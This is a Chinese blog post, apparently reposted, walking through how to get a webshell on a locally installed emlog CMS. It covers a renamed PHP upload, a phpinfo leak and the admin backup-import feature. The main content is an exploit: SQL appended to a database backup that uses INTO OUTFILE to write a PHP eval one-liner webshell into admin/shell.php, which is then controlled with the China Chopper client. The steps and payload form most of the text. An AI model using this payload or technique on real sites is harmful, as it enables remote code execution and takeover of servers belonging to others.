admin 管理员组

文章数量: 1184232

php如何用菜刀连接getshell,2019

一、使用phtstudy搭建环境

1,将emlog源码解压到phpstudy的www目录,复制emlog源码中的src所有文件到需要搭建emlog的目录中,修改emlog配置文件,输入好本机mysql账户信息,之后访问emlog,根据情况设置填写信息

二、寻找上传文件路径,上传getshell

查询资料发现后台admin界面有个信息泄漏漏洞,get action=phpinfo可以得到phpinfo,成功getshell需要利用下

1,首页是没有上传按钮的,所以需要登录管理后台,登录之后在发布文章的地方有上传选项,允许类型有不少rar zip gif jpg jpeg png txt pdf docx doc xls xlsx

2,上传webshell,准备好一句话php文件,直接上传,提示文件类型错误,明显直接上传php文件不行

3,修改成网站允许的文件后缀名之后尝试上传,发现只是修改文件后缀之后就可以上传成功,截图显示图是裂的没关系,因为是直接将php改后缀的没有图像数据所以是正常现象

4,上传成功之后,我以为可以直接getshell,发现自己天真了,到网站上传路径,发现所有上传的文件都只能是图片类型或其他类型,直接传脚本的方式不可行了,需要找其他方法

5,查找资料,发现后台有一个备份数据功能,还有导入本地备份功能,正式开始getshell

6,点击备份数据,将数据库的文件备份出来,在最后加入以下语句

Drop TABLE IF EXISTS emglog_shell;

create table emlog_shell(`cmd` text(999) not null);

INSERT INTO emlog_shell VALUES (‘<?php @eval($_POST["aaa"]);?>‘);

Select cmd from emlog_shell into outfile ‘D:/phpstudy_pro/WWW/emlog/admin/shell.php‘;

Drop TABLE IF EXISTS emglog_shell;

7,导入数据,发现成功导入shell.php

8,菜刀配置连接,成功getshell

原文:.html

本文标签: php如何用菜刀连接getshell 2019

版权声明:本文标题:php如何用菜刀连接getshell,2019 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/p/1698299371a292089.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。